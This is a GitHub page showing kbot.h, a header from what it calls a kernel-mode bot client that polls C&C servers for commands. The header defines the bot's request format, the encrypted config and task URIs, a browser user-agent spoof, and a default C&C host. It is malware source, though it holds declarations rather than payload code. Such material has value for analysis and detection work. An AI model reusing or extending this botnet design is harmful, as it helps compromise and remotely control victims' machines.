-
Notifications
You must be signed in to change notification settings - Fork 158
/
Copy pathkbot.h
91 lines (67 loc) · 2.35 KB
/
kbot.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KBot project.
//
// module: kbot.h
// $Revision: 33 $
// $Date: 2012-07-16 18:27:23 +0400 (Пн, 16 июл 2012) $
// description:
// Kernel-mode client program.
// Connects over the KIP to one of the specified C&C servers and receives specially formed configuration files and commands.
#define _ENCRYPT_REQUEST_URI TRUE
#define _USE_DIGITAL_SIGNATURE TRUE
#define KBOT_VERSION 0x100
#define KBOT_WAIT_BEFORE_START 2*60*1000 // milliseconds
#define KBOT_DEFAULT_CONFIG_PERIOD 60 // seconds
#define KBOT_DEFAULT_TASK_PERIOD 60*60*24*365 // seconds
#define KBOT_MINIMUM_REQUEST_PERIOD 2*60 // seconds
#define KBOT_CONTENT_BUFFER_SIZE 0x1000 // bytes
#define szKBotConfigFileName "KBOT.INI"
#define szKBotUserIdFileName "USER.ID"
#define CRC_PUBLIC_KEY 0xe1285e64
#define CRC_KBOT_INI 0x507fbe32
#define CRC_GROUP 0x656b798a
#define CRC_TASK_PERIOD 0x7c440bb2
#define CRC_CONFIG_PERIOD 0x986016fd
#define CRC_HOSTS 0xd0665bf6
#define CRC_KEY 0xe3c816dc
#define szRequestFmt "version=%u&user=%x%x%x%x&server=%u&id=%u&crc=%x"
#define szUserAgentFmt "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %1u.%1u;%s SV1)"
#define szX64 " x64;"
#ifdef _ENCRYPT_REQUEST_URI
#define SERVER_DEFAULT_KEY "0123456789ABCDEF"
#define szConfigUri "/c%s.php?%s="
#define szTaskUri "/t%s.php?%s="
#else
#define szConfigUri "/config.php?"
#define szTaskUri "/task.php?"
#endif
#define KBOT_DEFAULT_HOST_LIST " 10.30.29.241 "
#define INVALID_INDEX (-1)
typedef struct _KBOT_CONFIG
{
#if DBG
ULONG Magic;
#endif
ULONG ConfigCRC;
ULONG ConfigPeriod; // seconds
ULONG TaskPeriod; // seconds
ULONG MinimumPeriod; // seconds
ULONG ServerId;
ULONG GroupId;
PCHAR* HostArray;
PCHAR pHostList;
ULONG HostCount;
ULONG HostIndex;
PCHAR pKey;
} KBOT_CONFIG, *PKBOT_CONFIG;
typedef struct _KBOT_USER
{
GUID Id; // current user ID
} KBOT_USER, *PKBOT_USER;
#define KBOT_CONFIG_MAGIC 'TOBK'
#define ASSERT_KBOT_CONFIG(x) ASSERT(x->Magic == KBOT_CONFIG_MAGIC)
#define KBOT_DEFAULT_SERVER_ID 12
#define KBOT_DEFAULT_GROUP_ID 1012
PCHAR g_KbotUserAgent;
NTSTATUS KBotStartup(VOID);
VOID KBotCleanup(VOID);